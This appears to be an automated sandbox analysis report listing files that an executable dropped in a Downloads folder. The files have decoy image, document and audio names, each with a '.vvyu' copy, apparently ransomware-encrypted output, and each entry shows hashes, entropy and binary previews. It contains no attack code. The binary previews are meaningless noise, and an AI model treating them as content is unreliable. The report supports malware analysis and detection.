SHA-512:	4B4AB586C9C92941C835ED9C0EE050002C2B6C621C162AB11ABEE953C5CB5D00A6CF6094D880267619DF4055CAB5FBBC0AE2498E6A4B51718B292783318C6988
Malicious:	false
Preview:	EFOYFD...)@..a.....0CQ.^.....Y"4....X...L....#../.....2x..1&....o.1.0&.}s{Y-..cjP.M...........we.....g.F....V...#3}T.S>^b....>........@..6O5.....V..8..=H....;.]`.LO.>...o.'.g..P(...z...+N_..Y@...Y..Yj.k.V}r....O.+..H/~.p..._.<.'....$....M}..[i.<.._$Q....._.z;..D4[...M...Bj.l]qB]....J,8.$z....P.t.>B7Cl.?..4..oU..0.6../`.y....;[.Sb.@..9.!.h.@.7...$.0Q..b.T...o#0Y..S..ql4`......c...A..{.$..S.B}..~.P...b...x_q...H.}..6.@.s.0.`....2p..!p...[...F.FN.`..;........8z.#.>vI.S.L6..!j.C....X@.H.8.........t9.f..TH5.....(x;5.R.l.....*][.yIOF..P_.`h #.m..~.j...Uv..f......c.c.2...U...T.=;).,...8..\|m...?.<a..2..G...C....l^.@.'_.kjOO2..a0....Y....BtIo.c...@.......-g_c_v..@6g.....?Oq."...M..a.I..v\|..3.c.fc...ur...+..WE.s....OP(..xY.Y..O...\|..ARL..d.a..~\|gT..b....5Q.......db.w...,....(.F-.....t[.QC..1.{D.$...U..._!H7.0...<.B._...m..43..P.F.0.2Z..Q...-@.:.r......(ht..J%....{..gFb....@..h.o..g\.AYPP..6y..`>.[/.7.{.k.U'......D.SE.3F<...I..,+....:.[..Gl4...?.1......A,y..${.

C:\Users\user\Downloads\EFOYFBOLXA.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838640069145371
Encrypted:	false
SSDEEP:	24:Ez9t1X8ixCtkgoFC/fP4pxzmZwMMqyUGX8P1tYZwdj/+7Sk+/ghsbD:6X86Ckd8/fP4p9EI8PnXdb+ukFmD
MD5:	A848AD17DF6CD4BE7F544AAEF2B1AE16
SHA1:	DF4065A8B7A067D7BB9374FB74F126AA4CABE4B2
SHA-256:	B6AF7DF2DB6CBBD4347EE6AADBFA454282ADFF773BDF90244E377363111771A0
SHA-512:	4B4AB586C9C92941C835ED9C0EE050002C2B6C621C162AB11ABEE953C5CB5D00A6CF6094D880267619DF4055CAB5FBBC0AE2498E6A4B51718B292783318C6988
Malicious:	false
Preview:	EFOYFD...)@..a.....0CQ.^.....Y"4....X...L....#../.....2x..1&....o.1.0&.}s{Y-..cjP.M...........we.....g.F....V...#3}T.S>^b....>........@..6O5.....V..8..=H....;.]`.LO.>...o.'.g..P(...z...+N_..Y@...Y..Yj.k.V}r....O.+..H/~.p..._.<.'....$....M}..[i.<.._$Q....._.z;..D4[...M...Bj.l]qB]....J,8.$z....P.t.>B7Cl.?..4..oU..0.6../`.y....;[.Sb.@..9.!.h.@.7...$.0Q..b.T...o#0Y..S..ql4`......c...A..{.$..S.B}..~.P...b...x_q...H.}..6.@.s.0.`....2p..!p...[...F.FN.`..;........8z.#.>vI.S.L6..!j.C....X@.H.8.........t9.f..TH5.....(x;5.R.l.....*][.yIOF..P_.`h #.m..~.j...Uv..f......c.c.2...U...T.=;).,...8..\|m...?.<a..2..G...C....l^.@.'_.kjOO2..a0....Y....BtIo.c...@.......-g_c_v..@6g.....?Oq."...M..a.I..v\|..3.c.fc...ur...+..WE.s....OP(..xY.Y..O...\|..ARL..d.a..~\|gT..b....5Q.......db.w...,....(.F-.....t[.QC..1.{D.$...U..._!H7.0...<.B._...m..43..P.F.0.2Z..Q...-@.:.r......(ht..J%....{..gFb....@..h.o..g\.AYPP..6y..`>.[/.7.{.k.U'......D.SE.3F<...I..,+....:.[..Gl4...?.1......A,y..${.

C:\Users\user\Downloads\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8781942805294785
Encrypted:	false
SSDEEP:	24:KYt6s2wh8ikBe3+n9zDbDzVcTURXpE1hwRfQ7R8moIUekzKLv5dYzy/ekZjHsbD:NBd8/s3A9zDbDzV8URXpE7RR+1KLv5Ez
MD5:	59383A32E1781C77B069F614825D3537
SHA1:	B6D9C0A46A0D67263EFE1C8F6FE4912F5868316E
SHA-256:	493EA42498DBA4C1CB60B584B8A703040AD6EE16198C0A961578A188AA300740
SHA-512:	58E471DEFF61A9760370CBB8D3FE2BD46CE64B2F6653619AAD77382F76F6C680B9F13E07E9415DFF1DDF564F4B0FFB2777D1ADE10F42C8999145592068AE83A0
Malicious:	false
Preview:	EFOYF......kh.$......c.~\@.D....d."=.]hN.H.....%0..=Z..#.B...i..`ds..2C;T..}.w...X...w....P..%.e.[O.\.SV\...A3.M....._...p......2a...Z5.G.U....W...}..b<D...).QK.)Pn.H.VV2.W..kX.G.p.y..g.....'m.yR]N..k.H'lmF..?.Guu.Z.@.k. 7K{...@..J~...%..W.....).-.^.....Ek.2....Oo%.s...f.g...M&...3L_..W=rdG..6.....0.>.OU..pPR..}..k..nE.....x...).....l.o.......".~.8...Iy........A......f..3\|...:.Rar..I....y^.....7..<^...J....c..W...eb.JL.^.._.:m...V.C..IK.:....z.<.;..4...b_.e.{Z..I!..V.....O..].t..I....c...U.S6.H...K.....y...........Ry+]eb....Jy.]...^....V....MQ(..:.?......QU:...6...!....E}..n&m..g..j...;.....(.x......t...L...'......Rk.xFE.q.{..1.y..Q.t..7B."..&.(-a..M`.....o..)Zp.Y.f..E.\.@Sa......v.%@....A1.X+I..I.........l.;..:[...D..Y M.HS../z...P.......rFR..TF.*\|..#+I.g....S...^fs.Y..o...Q.<A.6....Q...1......3..5Q....e....9i.U...._..J.v,../oCZs..B.8kc.7..>...G...E..c.........c? ..Z..z_s.q.....i...i$...^{..i.#7..<..$....t......\|..x-.k.k.............6._]....c:..)+y

C:\Users\user\Downloads\EFOYFBOLXA.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8781942805294785
Encrypted:	false
SSDEEP:	24:KYt6s2wh8ikBe3+n9zDbDzVcTURXpE1hwRfQ7R8moIUekzKLv5dYzy/ekZjHsbD:NBd8/s3A9zDbDzV8URXpE7RR+1KLv5Ez
MD5:	59383A32E1781C77B069F614825D3537
SHA1:	B6D9C0A46A0D67263EFE1C8F6FE4912F5868316E
SHA-256:	493EA42498DBA4C1CB60B584B8A703040AD6EE16198C0A961578A188AA300740
SHA-512:	58E471DEFF61A9760370CBB8D3FE2BD46CE64B2F6653619AAD77382F76F6C680B9F13E07E9415DFF1DDF564F4B0FFB2777D1ADE10F42C8999145592068AE83A0
Malicious:	false
Preview:	EFOYF......kh.$......c.~\@.D....d."=.]hN.H.....%0..=Z..#.B...i..`ds..2C;T..}.w...X...w....P..%.e.[O.\.SV\...A3.M....._...p......2a...Z5.G.U....W...}..b<D...).QK.)Pn.H.VV2.W..kX.G.p.y..g.....'m.yR]N..k.H'lmF..?.Guu.Z.@.k. 7K{...@..J~...%..W.....).-.^.....Ek.2....Oo%.s...f.g...M&...3L_..W=rdG..6.....0.>.OU..pPR..}..k..nE.....x...).....l.o.......".~.8...Iy........A......f..3\|...:.Rar..I....y^.....7..<^...J....c..W...eb.JL.^.._.:m...V.C..IK.:....z.<.;..4...b_.e.{Z..I!..V.....O..].t..I....c...U.S6.H...K.....y...........Ry+]eb....Jy.]...^....V....MQ(..:.?......QU:...6...!....E}..n&m..g..j...;.....(.x......t...L...'......Rk.xFE.q.{..1.y..Q.t..7B."..&.(-a..M`.....o..)Zp.Y.f..E.\.@Sa......v.%@....A1.X+I..I.........l.;..:[...D..Y M.HS../z...P.......rFR..TF.*\|..#+I.g....S...^fs.Y..o...Q.<A.6....Q...1......3..5Q....e....9i.U...._..J.v,../oCZs..B.8kc.7..>...G...E..c.........c? ..Z..z_s.q.....i...i$...^{..i.#7..<..$....t......\|..x-.k.k.............6._]....c:..)+y

C:\Users\user\Downloads\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826554064874248
Encrypted:	false
SSDEEP:	24:nARLAsL415AMoaWmY4qg94Mpbf1rP0+7dOUd/s1xmzuhn4sbD:+DqNYRgD9fK+7Ze1UChn4mD
MD5:	01D6CD3F85E0F508F2ECC6C8FA58C390
SHA1:	74BC840893FB0E3D2A1BCEA8E9E01A50B54DC63C
SHA-256:	A13D1175BEF71707FEBD5EFC8C1F223FC887E3D5F8AE1F10B78F286389A3D339
SHA-512:	DB079F3DAFFA301A2F1CB2102C4D20D5EC0F30E761D4A3A040D9366B2F7F007EC7A07377DEE4ABC6548F456E6EA514D5D252D4BC36720A3E997DF2F78A7052DD
Malicious:	false
Preview:	EOWRV..~....H.,.-.qt.F.)O...})&..I...(c>....T....!z..<.w.r?...S.........Q}..../.h4.../.21X.+..M..9........hS 5..;A.^Wf.]....k.p.#B.....-X`.lA.WdU.k.V..f.3}7.........~...o.o2.x.."c...+=.............9......M...A...r....tc.3....0..^................\9....+'.Ch...`..C.6...7..y..g...{....pUq.l.....t.c.......T.9E [...&.~.A....Y...n.<.Xa.s...m..U..~[. {.t.>p..S.T'...B.Z.....9.......q..Q.^.....H.....}..p.-6....4....b.[uJ.FET.w..n......1..w]..nFx.o..?.A/.X.....\....#.....E.RREf.f..S.2Wh..=......s.l...4^.0...L...pd..?U3.?..:...^..cG....G)$........T.\...Fu.k.k.c.*...s-O.6....O.....&c....1..Ma..o8 .t5lkx1.l.....C.T..0:.$M!.7.A.)5..%..6+...Gojd...I.9djq.2{S..j....i.. z...M.........j .8C..m..,O..V..1 @T...S\NM6\|.{..]0.u4.4..R...^h.z...n8........h...\|..%.0a.].c6...s....Buy...$._\|x..j..dYp....5l..^.`.m.0..,}t..ue..+.....\|.~l..;L.+..g.-....OXW!.^_..H3.f=..}..Dj<.EZj..5..o..`m.>.;]...;\X.w..b.N \...?}.A....o}~.:.m...?.\|....z.sH.n.{H.Tb.zr..PO..CiA.(?q.....

C:\Users\user\Downloads\EOWRVPQCCS.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826554064874248
Encrypted:	false
SSDEEP:	24:nARLAsL415AMoaWmY4qg94Mpbf1rP0+7dOUd/s1xmzuhn4sbD:+DqNYRgD9fK+7Ze1UChn4mD
MD5:	01D6CD3F85E0F508F2ECC6C8FA58C390
SHA1:	74BC840893FB0E3D2A1BCEA8E9E01A50B54DC63C
SHA-256:	A13D1175BEF71707FEBD5EFC8C1F223FC887E3D5F8AE1F10B78F286389A3D339
SHA-512:	DB079F3DAFFA301A2F1CB2102C4D20D5EC0F30E761D4A3A040D9366B2F7F007EC7A07377DEE4ABC6548F456E6EA514D5D252D4BC36720A3E997DF2F78A7052DD
Malicious:	false
Preview:	EOWRV..~....H.,.-.qt.F.)O...})&..I...(c>....T....!z..<.w.r?...S.........Q}..../.h4.../.21X.+..M..9........hS 5..;A.^Wf.]....k.p.#B.....-X`.lA.WdU.k.V..f.3}7.........~...o.o2.x.."c...+=.............9......M...A...r....tc.3....0..^................\9....+'.Ch...`..C.6...7..y..g...{....pUq.l.....t.c.......T.9E [...&.~.A....Y...n.<.Xa.s...m..U..~[. {.t.>p..S.T'...B.Z.....9.......q..Q.^.....H.....}..p.-6....4....b.[uJ.FET.w..n......1..w]..nFx.o..?.A/.X.....\....#.....E.RREf.f..S.2Wh..=......s.l...4^.0...L...pd..?U3.?..:...^..cG....G)$........T.\...Fu.k.k.c.*...s-O.6....O.....&c....1..Ma..o8 .t5lkx1.l.....C.T..0:.$M!.7.A.)5..%..6+...Gojd...I.9djq.2{S..j....i.. z...M.........j .8C..m..,O..V..1 @T...S\NM6\|.{..]0.u4.4..R...^h.z...n8........h...\|..%.0a.].c6...s....Buy...$._\|x..j..dYp....5l..^.`.m.0..,}t..ue..+.....\|.~l..;L.+..g.-....OXW!.^_..H3.f=..}..Dj<.EZj..5..o..`m.>.;]...;\X.w..b.N \...?}.A....o}~.:.m...?.\|....z.sH.n.{H.Tb.zr..PO..CiA.(?q.....

C:\Users\user\Downloads\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86100921335362
Encrypted:	false
SSDEEP:	24:edC2JWaowk7HfW1eZCDaJ7zNbiqOArX2tqIMc0n2y5YeHxG5HaIfqSbD7DGUnLbe:UC2nzkTfHJ7zNbFrGtqpc0vevfDP7HmD
MD5:	4107695665CDFAC0532824AC8C4F209F
SHA1:	9E2FA7D071FC1B577A16EFE62639B80FE30FBA4A
SHA-256:	B1A7BD56EEF5395B4DAF699DBF3EBAE8634505D097198161ABD3B19A831399D4
SHA-512:	02022A78A9AD53CF634A5F99388C39AB2E2DC2D4818A512574D56C5368EFBBD67DB2D6EC313F95D22B8F649244C8EB0FAE0A581C956F631CF1C9B1A3F0FE6C4A
Malicious:	false
Preview:	EWZCVl.o-/.$oi.(.X.C.G.#.-&]"..j.Sl..._.wrJ....S....Q.0Q".Q.2...T....."...a..................M..3...T.7.....\.>.7..'..S@...N.I%I..".^...=.P...P....6O$.s.,.).p[.w..1..9...[.$I.-......(Z.......x..^.Z.........i....J)b....NQ../u...'{Mp3..P.......k...(...[.....Z4....%4=...2......1........@udu.._...g...........j.\...."d9H)...1(.Y.@CY..p>.>+z..f..O.?......8..a....8.3.JJ.o..>....Q.i......e...x..N.....1g+.'.h..[.....p.)o....\..c.M3u.(..@......r)..t.d.`...WE...#.L. ....Y...+.~kdw[.Xm..?n4......X.cY......n.z.H=.F.IV.i...x....N........UV..^/.K?c.C..u.FA.\|...' m.....p......vU...W.qu.=...mg...A..B...B(\v.hS.m.@J...n....n.....42g.MD..}.Z.zhq....<..u..6W..\i'/.\|.3.G...=..v...{O....,.......=...@z.7....3..lK.I[U<..z.........O.q.........s..A.....dkx...G?......+.^.BP...&.l...`..{..)L....W31...gD....$.h.:W.....A....oV.:...=/.\|....J.>.nW...>%..U..@l...%.Q..F.3.3..w.....{.p.[.7..?c(...P.A..F.H`.....V..a2..H.1W..L.0.O.X...M....;..Z.D.^..Jg......Js(.......w.G

C:\Users\user\Downloads\EWZCVGNOWT.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86100921335362
Encrypted:	false
SSDEEP:	24:edC2JWaowk7HfW1eZCDaJ7zNbiqOArX2tqIMc0n2y5YeHxG5HaIfqSbD7DGUnLbe:UC2nzkTfHJ7zNbFrGtqpc0vevfDP7HmD
MD5:	4107695665CDFAC0532824AC8C4F209F
SHA1:	9E2FA7D071FC1B577A16EFE62639B80FE30FBA4A
SHA-256:	B1A7BD56EEF5395B4DAF699DBF3EBAE8634505D097198161ABD3B19A831399D4
SHA-512:	02022A78A9AD53CF634A5F99388C39AB2E2DC2D4818A512574D56C5368EFBBD67DB2D6EC313F95D22B8F649244C8EB0FAE0A581C956F631CF1C9B1A3F0FE6C4A
Malicious:	false
Preview:	EWZCVl.o-/.$oi.(.X.C.G.#.-&]"..j.Sl..._.wrJ....S....Q.0Q".Q.2...T....."...a..................M..3...T.7.....\.>.7..'..S@...N.I%I..".^...=.P...P....6O$.s.,.).p[.w..1..9...[.$I.-......(Z.......x..^.Z.........i....J)b....NQ../u...'{Mp3..P.......k...(...[.....Z4....%4=...2......1........@udu.._...g...........j.\...."d9H)...1(.Y.@CY..p>.>+z..f..O.?......8..a....8.3.JJ.o..>....Q.i......e...x..N.....1g+.'.h..[.....p.)o....\..c.M3u.(..@......r)..t.d.`...WE...#.L. ....Y...+.~kdw[.Xm..?n4......X.cY......n.z.H=.F.IV.i...x....N........UV..^/.K?c.C..u.FA.\|...' m.....p......vU...W.qu.=...mg...A..B...B(\v.hS.m.@J...n....n.....42g.MD..}.Z.zhq....<..u..6W..\i'/.\|.3.G...=..v...{O....,.......=...@z.7....3..lK.I[U<..z.........O.q.........s..A.....dkx...G?......+.^.BP...&.l...`..{..)L....W31...gD....$.h.:W.....A....oV.:...=/.\|....J.>.nW...>%..U..@l...%.Q..F.3.3..w.....{.p.[.7..?c(...P.A..F.H`.....V..a2..H.1W..L.0.O.X...M....;..Z.D.^..Jg......Js(.......w.G

C:\Users\user\Downloads\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826789113224841
Encrypted:	false
SSDEEP:	24:qm2dVlwIxpi7mb+P+tWdUjoq3ebNpwZxpPCeU4ZdDXUG4gb/6sbD:qlVlP3b/ZG6BlJZdbDbSmD
MD5:	54245DF2701BEEC9C3661465BD6F313F
SHA1:	ADAA57FBEB10B5665C45AE8AEAE086ECF4C78A1E
SHA-256:	CD92132BDDB154B634DECA07B13DB93ED9308800242476F9E77715D3F73678E5
SHA-512:	5C431B400A694BFDAC6704D5A8629D01515D38D656C0AD40C0BFB515AA3C4993AE1FC300C1369AC9F37F76DD65565D6FB94F60C75434669A77171A528A0CA9F1
Malicious:	false
Preview:	EWZCV.....&p..C..H.R~.A.D..5...S5.s..du...e..F.m.U..{\......\|0u..i...b....dL.A..o....w.f...h2u.\.W.~l.z#dZ...U..L...-+......e.i....yF...S. ...h........$<3...R.).....R.G<.<...... Re^.z.[].B.8....%..m\E...4..A.%'.......Lzk6.`...+qf.)r.05...".....KnubD..b6...}..Aj......>......]..=#.....h.O$.Q.'.Z0.u.j...g.......AI.r=..............m..(.Q.j,.....(.H.u{.5'..JH..;..7..d(..........,m...q...0bJ.....RO'$[.4.:...r.........4\.:!.c..Q~.6[=........K=.wR.7.{........"a".L.'ff....8y.!OC+.r....?..B......c..!:J.<i.9..N....5o..B.VU..1..M.'9:3.hoR..'..={(z{.......=.B......]j..P.^.k<N.}.D8..Bk...[K.@Z .U.d...R....T.,..&..TA...u..>..^.. ...@...N....?..I..Q<2..OP.h.<...-..l.....p.C...0B.l..V.eo9@(.?..4..d7.1..a..'.x;.o\|.fd......,.KU..#.?<)....l........A.9.\|...2.hN.8^..5."O...IS...&..u.pA$..v....#b./.i...B..VLd.......O..vp.......y...~..mHW..^7.8..x...@.....7.1H.w......j.@.\|1.7.-...k......*.\|...P .~^.(..!..~...B.Q..e.S....Xi>z3.F.C..K.O.~&(.e.Q.E.<sr.;[...F.~....

C:\Users\user\Downloads\EWZCVGNOWT.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826789113224841
Encrypted:	false
SSDEEP:	24:qm2dVlwIxpi7mb+P+tWdUjoq3ebNpwZxpPCeU4ZdDXUG4gb/6sbD:qlVlP3b/ZG6BlJZdbDbSmD
MD5:	54245DF2701BEEC9C3661465BD6F313F
SHA1:	ADAA57FBEB10B5665C45AE8AEAE086ECF4C78A1E
SHA-256:	CD92132BDDB154B634DECA07B13DB93ED9308800242476F9E77715D3F73678E5
SHA-512:	5C431B400A694BFDAC6704D5A8629D01515D38D656C0AD40C0BFB515AA3C4993AE1FC300C1369AC9F37F76DD65565D6FB94F60C75434669A77171A528A0CA9F1
Malicious:	false
Preview:	EWZCV.....&p..C..H.R~.A.D..5...S5.s..du...e..F.m.U..{\......\|0u..i...b....dL.A..o....w.f...h2u.\.W.~l.z#dZ...U..L...-+......e.i....yF...S. ...h........$<3...R.).....R.G<.<...... Re^.z.[].B.8....%..m\E...4..A.%'.......Lzk6.`...+qf.)r.05...".....KnubD..b6...}..Aj......>......]..=#.....h.O$.Q.'.Z0.u.j...g.......AI.r=..............m..(.Q.j,.....(.H.u{.5'..JH..;..7..d(..........,m...q...0bJ.....RO'$[.4.:...r.........4\.:!.c..Q~.6[=........K=.wR.7.{........"a".L.'ff....8y.!OC+.r....?..B......c..!:J.<i.9..N....5o..B.VU..1..M.'9:3.hoR..'..={(z{.......=.B......]j..P.^.k<N.}.D8..Bk...[K.@Z .U.d...R....T.,..&..TA...u..>..^.. ...@...N....?..I..Q<2..OP.h.<...-..l.....p.C...0B.l..V.eo9@(.?..4..d7.1..a..'.x;.o\|.fd......,.KU..#.?<)....l........A.9.\|...2.hN.8^..5."O...IS...&..u.pA$..v....#b./.i...B..VLd.......O..vp.......y...~..mHW..^7.8..x...@.....7.1H.w......j.@.\|1.7.-...k......*.\|...P .~^.(..!..~...B.Q..e.S....Xi>z3.F.C..K.O.~&(.e.Q.E.<sr.;[...F.~....

C:\Users\user\Downloads\GRXZDKKVDB.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84990248529984
Encrypted:	false
SSDEEP:	24:1sJf7atg0RNX6W2BcE3IRioVP8TLdoLdeFNRKHqev0hnTIJxnsbD:EzinbXWKGxol8FFiHqY0lOxnmD
MD5:	12F3E816E00DE9290F25CC608A7B0122
SHA1:	40B9F7372712DCB72A21D9CCF2446BDA097087E5
SHA-256:	B6FBD2599A9219DFB1C7616E4D0E221DE128BD0D8899329851A5311D7EC79412
SHA-512:	A378B2D250E8729E3205E06D0BFC504D4214DF29D7576660B096773A958E9078EB0A928AD841C2E09BD5DA3E696C93540815B8DF93F51E222F1361BA6CD15156
Malicious:	false
Preview:	GRXZDXr......I~...5r..P..s..T..E.?%..C..S.7.g.F.PX+..$b.k.,.[K....Y}.TB...#.ZiW.q$.j..$".#. Wj.x..5. ..y.m...../.> =5...M...6..\|. ..xx....J.W4}\......t..........."..{D.L..=.....jWRe._........(.u.c..w\Zep).eO.......W..J..Q.r.Vj....^J.0..B......N.......H\|.!F;..!. ......W...........Q.h...e.!.."-.z?.x/5F.ed."....{wT<.@l..q...G..8K..8)...P..}.y.L.)2..kEQ<..d....=.F{.8q`.........7U..\\|....`....Is\.~U.X.!...........z..k.$...t.\|....L.S.....HV.=.].O.vA.._.6.[.^.`~.....N.....&...0..J..l.$$.t.,.,.'t.......7..N...f..q^:.K........B.me....CG..;v"...2> .K'.0aqBK...5>......6.eR~..f[.....h.'...J.W...,6w...h...............\|.S0'..>....W.k........\,gnB.;..4v^........"....\|v.o......".....)..on....).O..y..........L....lU....9.^..s...^...."1.....U.&.sv=D. t!8.....?...v$.~J...(...1i..h...C?...........0.....x~.$.5m...W9E..M.L...U..g..P..f..T.+...M.8.G.(.c.......+.Qr!.vX..b.Y.k)V.M..H$.......#V4.;{..{9.;b..._;.4..I\o...Z8.4.%?..@NK..BW....S8.)........L..o....l.

C:\Users\user\Downloads\GRXZDKKVDB.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84990248529984
Encrypted:	false
SSDEEP:	24:1sJf7atg0RNX6W2BcE3IRioVP8TLdoLdeFNRKHqev0hnTIJxnsbD:EzinbXWKGxol8FFiHqY0lOxnmD
MD5:	12F3E816E00DE9290F25CC608A7B0122
SHA1:	40B9F7372712DCB72A21D9CCF2446BDA097087E5
SHA-256:	B6FBD2599A9219DFB1C7616E4D0E221DE128BD0D8899329851A5311D7EC79412
SHA-512:	A378B2D250E8729E3205E06D0BFC504D4214DF29D7576660B096773A958E9078EB0A928AD841C2E09BD5DA3E696C93540815B8DF93F51E222F1361BA6CD15156
Malicious:	false
Preview:	GRXZDXr......I~...5r..P..s..T..E.?%..C..S.7.g.F.PX+..$b.k.,.[K....Y}.TB...#.ZiW.q$.j..$".#. Wj.x..5. ..y.m...../.> =5...M...6..\|. ..xx....J.W4}\......t..........."..{D.L..=.....jWRe._........(.u.c..w\Zep).eO.......W..J..Q.r.Vj....^J.0..B......N.......H\|.!F;..!. ......W...........Q.h...e.!.."-.z?.x/5F.ed."....{wT<.@l..q...G..8K..8)...P..}.y.L.)2..kEQ<..d....=.F{.8q`.........7U..\\|....`....Is\.~U.X.!...........z..k.$...t.\|....L.S.....HV.=.].O.vA.._.6.[.^.`~.....N.....&...0..J..l.$$.t.,.,.'t.......7..N...f..q^:.K........B.me....CG..;v"...2> .K'.0aqBK...5>......6.eR~..f[.....h.'...J.W...,6w...h...............\|.S0'..>....W.k........\,gnB.;..4v^........"....\|v.o......".....)..on....).O..y..........L....lU....9.^..s...^...."1.....U.&.sv=D. t!8.....?...v$.~J...(...1i..h...C?...........0.....x~.$.5m...W9E..M.L...U..g..P..f..T.+...M.8.G.(.c.......+.Qr!.vX..b.Y.k)V.M..H$.......#V4.;{..{9.;b..._;.4..I\o...Z8.4.%?..@NK..BW....S8.)........L..o....l.

C:\Users\user\Downloads\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84654648427444
Encrypted:	false
SSDEEP:	24:FZzwuzFDUxOyzDB0Q9LUXLzee5cT7hLZYuW9neZKXIiDQFZwbDd9F0EjcerNsbD:FxVzFDUxOy/B0sL+zbcTBZDvwXIiUFZd
MD5:	3E6DAB391A7C012A09DED82886024206
SHA1:	DC71F5AE0F362543F4119D03870D10943DB9D82A
SHA-256:	A18CF5C459F049944F328F9CC9D7C7334682A2FE1FE4C17C63E6EDD1E89BE985
SHA-512:	06B7626299A2AB4162BACAAFAC108676A0BEB5A851C32846215E3DA968FE8593763D9A615CB8B1A476B8728811766634733FDE3506212C6AB87E681187E1548D
Malicious:	false
Preview:	NVWZA.....W.p.(.b.W.J..}.R1.p.#....p.~3`..\|.&..}.........-[..;.7..\w....o..T.p.!..o...Y+~.....d.b..f.gl.<.C.......s.B.N..k.7 .......Um...m......\|...S?.Ji....WgH.9v..d`..Bk.4..n\|..q...2>.p..M.(.{....W.g.....m....k.v...>..=F..!z+%M.}M..!.<.d...m..]V.6..%.}..&....uX...a".b.<.....0..,..;\|..!.._.a..B(..5.E0....r..G..b[..o>.).b1_..W.#8...a..N!..Q}.+.F.... .....^.Sc.m..-x+)..HW.?{.......`.@.T.u...aV.6}...3$....(.>..E...N"...b}.B..MN......b#a..d.q5.>90\|."U.@.\../...+S.]..>v...\|....uZt..i.}..o...U.2.!...<-...L.+..5.........g.`.......HP.n..}_G.uL..l.5E.....!G.Q.k..8..+e;@X...^^...+bP.}..../g....IC)V..w..>C..v&.uI./.N..j...B........28.._.v/..h..Ku....}s..K.,...F.h_6+.`.6K...^5&.A@E ..k., W..3..</..-........v.......s...#.....H/.,.. ....WE..E.........yL..G......v.NM1N4.w....%.S.pG....l.:">....i.^8....$..nh.k.+P.r.......C......R.{z<....,.B.[GN....<...+r>B..>....nB7.....O^..k..=......=ln.K.]>.<.7..^..5&.WvW)`2o..C+......w8...P.yw#W...Zd.k...

C:\Users\user\Downloads\NVWZAPQSQL.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84654648427444
Encrypted:	false
SSDEEP:	24:FZzwuzFDUxOyzDB0Q9LUXLzee5cT7hLZYuW9neZKXIiDQFZwbDd9F0EjcerNsbD:FxVzFDUxOy/B0sL+zbcTBZDvwXIiUFZd
MD5:	3E6DAB391A7C012A09DED82886024206
SHA1:	DC71F5AE0F362543F4119D03870D10943DB9D82A
SHA-256:	A18CF5C459F049944F328F9CC9D7C7334682A2FE1FE4C17C63E6EDD1E89BE985
SHA-512:	06B7626299A2AB4162BACAAFAC108676A0BEB5A851C32846215E3DA968FE8593763D9A615CB8B1A476B8728811766634733FDE3506212C6AB87E681187E1548D
Malicious:	false
Preview:	NVWZA.....W.p.(.b.W.J..}.R1.p.#....p.~3`..\|.&..}.........-[..;.7..\w....o..T.p.!..o...Y+~.....d.b..f.gl.<.C.......s.B.N..k.7 .......Um...m......\|...S?.Ji....WgH.9v..d`..Bk.4..n\|..q...2>.p..M.(.{....W.g.....m....k.v...>..=F..!z+%M.}M..!.<.d...m..]V.6..%.}..&....uX...a".b.<.....0..,..;\|..!.._.a..B(..5.E0....r..G..b[..o>.).b1_..W.#8...a..N!..Q}.+.F.... .....^.Sc.m..-x+)..HW.?{.......`.@.T.u...aV.6}...3$....(.>..E...N"...b}.B..MN......b#a..d.q5.>90\|."U.@.\../...+S.]..>v...\|....uZt..i.}..o...U.2.!...<-...L.+..5.........g.`.......HP.n..}_G.uL..l.5E.....!G.Q.k..8..+e;@X...^^...+bP.}..../g....IC)V..w..>C..v&.uI./.N..j...B........28.._.v/..h..Ku....}s..K.,...F.h_6+.`.6K...^5&.A@E ..k., 